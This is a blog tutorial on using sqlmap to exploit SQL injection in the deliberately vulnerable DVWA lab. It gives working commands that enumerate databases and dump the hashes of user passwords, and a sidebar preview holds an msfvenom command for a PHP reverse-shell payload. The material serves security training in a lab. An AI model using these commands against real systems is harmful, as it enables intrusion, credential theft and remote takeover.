Automate SQL Injection Exploitation with SqlMap - DVWA

-

Automate SQL Injection Exploitation with SqlMap - Damn Vulnerable Web App (DVWA)

What is a SQL Injection?

SQL injection is a technique often used to attack data driven applications. SQL injection is considered a high risk vulnerability due to the fact that can lead to full compromise of the web application. This is why in almost all web application penetration testing engagements, the applications are always checked for SQL injection flaws.

A general and simple definition of when an application is vulnerable to SQL injection is when the application allows you to interact with the database and to execute queries on the database then it is vulnerable to SQL injection attacks.

This is done by crafted parameter/statements passed as input (HTML form) in an attempt to get the website to pass a newly formed SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a vulnerability in an web application's code. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

What is sqlmap?

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. 

In this post our target is DVWA web application. You can download it from following link:

Download DVWA

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

Obtain Database Data For DVWA

Notes:

1. Obtain the referer link using BurpSuite's intruder tool, which is placed after the "-u" option.

2. Obtain the cookie with PHPSESSID line using BurpSuite's intruder tool, which is placed after the "--cookie" option.

3. In URL replace 192.168.1.104 with IP Address of your system on which DVWA running/hosting 

4. Install & configure python and sqlmap on your system.


STEP-1: Run sqlmap with appropriate option or switch and Obtain a list of all Databases

$ sudo sqlmap "sqlmap -u "http://192.168.1.104/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=i7a765ku9dkg6usjtpu16lbd36; security=low" -dbs

Where -dbs option for list out all databases in database

Above statement retived all the databses of MySQL database:

fetching database names
[*] bwapp
[*] cssm
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
STEP-2: fetching list of tables for database e.g. 'dvwa' 
$ sudo sqlmap -u "http://192.168.1.104/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=i7a765ku9dkg6usjtpu16lbd36; security=low" -D dvwa --tables 
Where -D <specific database name>
      -- tables for list out all tables of the specific database
fetching tables for database: 'dvwa'
Database: dvwa
+------------+
| guestbook |
| users        |
+------------+
STEP-3: fetching columns for table 'users' in database 'dvwa' 
$ sudo sqlmap -u "http://192.168.1.104/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=i7a765ku9dkg6usjtpu16lbd36; security=low" -D dvwa -T users -columns 
Where -D <specific database name> 
      -T <specific table name>
      --columns for list out all columns names of tables of the specific database 
Database: dvwa
Table: users
+--------------+--------------+
| Column        | Type           |
+--------------+--------------+
| user            | varchar(15) |
| avatar         | varchar(70) |
| failed_login  | int(3)          |
| first_name   | varchar(15) |
| last_login     | timestamp  |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id        | int(6)          |
+--------------+--------------+ 

 STEP-4:  Obtain Users and their Passwords from table dvwa.users 

 $ sudo sqlmap -u "http://192.168.1.104/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=i7a765ku9dkg6usjtpu16lbd36; security=low" -D dvwa -T users -C user,password --dump 
 Where -D <specific database name>  
       -T <specific table name> 
       -C <columnname1, columnname2,....> for fetching data of columns  
       --dump dump data to dump file
+--------------+-------------------------------------------+
| User            | Password                                          |
+--------------+-------------------------------------------+
| admin         | 5f4dcc3b5aa765d61d8327deb882cf99  |
| gordonb      | e99a18c428cb38d5f260853678922e03 |
| pablo          | 0d107d09f5bbe40cade3de5c71e9e9b7 |
| smithy        | 5f4dcc3b5aa765d61d8327deb882cf99  |
+--------------+-------------------------------------------+ 

Comments

Post a Comment

Popular posts from this blog

Exploiting a Web Server - Using msfvenom generated PHP Web Payload

-
Image
 Exploiting a Web Server - Using msfvenom generated PHP Web Payload  This exploit uses some of the file upload functions of the DVWA web site to demonstrate how to hack through the site itself. A hacker would use this type of vulnerability to gain access to web applications, servers, and data. We will start by creating a pre-prepared PHP code that we will upload to the web server through the upload functionality provide by DVWA.  For this exercise, I hosted DVWA application in XAMPP on my host operating system. I will generate PHP code using msfvenom on Kali Linux which is hosted/run on oracle VBOX. On the Kali Linux, run the following command to generate PHP Web Payload: $ msfvenom -p php/meterpreter/reverse_tcp LHOST=<Local IP>  LPORT=<Local Port>  -f raw > phpshell.php For example, $ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 -f exe > phpshell.exe Here, 192.168.0.2 is a IP Address of Kali Server It will generate fo...
Read more

How To Imitate (Replicate) pbcopy And pbpaste Commands On Linux

-
Image
How To I mitate (Replicate ) pbcopy And pbpaste Commands On Linux pbcopy  on a mac enables you to copy the standard input from terminal window to your clipboard enabling you to paste it to other applications.  This functionality is not   available  by default on  Ubuntu / Linux  but can be easily imitate using  available Linux commands You can  imitate  pbcopy and  pbpaste     on ubuntu/linux by using similar tool called  xclip which does exactly the same.  However its syntax is a little complicated  it required more options/switches. So,  I am going to  imitate  it with  pbcopy and pbpaste command. Fortunately, OS X and Linux *nix based we can make use of the The alias c ommand to replicate the pbcopy and pbpaste functionality in ubuntu/linux. If you haven’t previously installed xclip simply run the following command in your terminal:    $  sudo apt-get install xclip -y Edit y...
Read more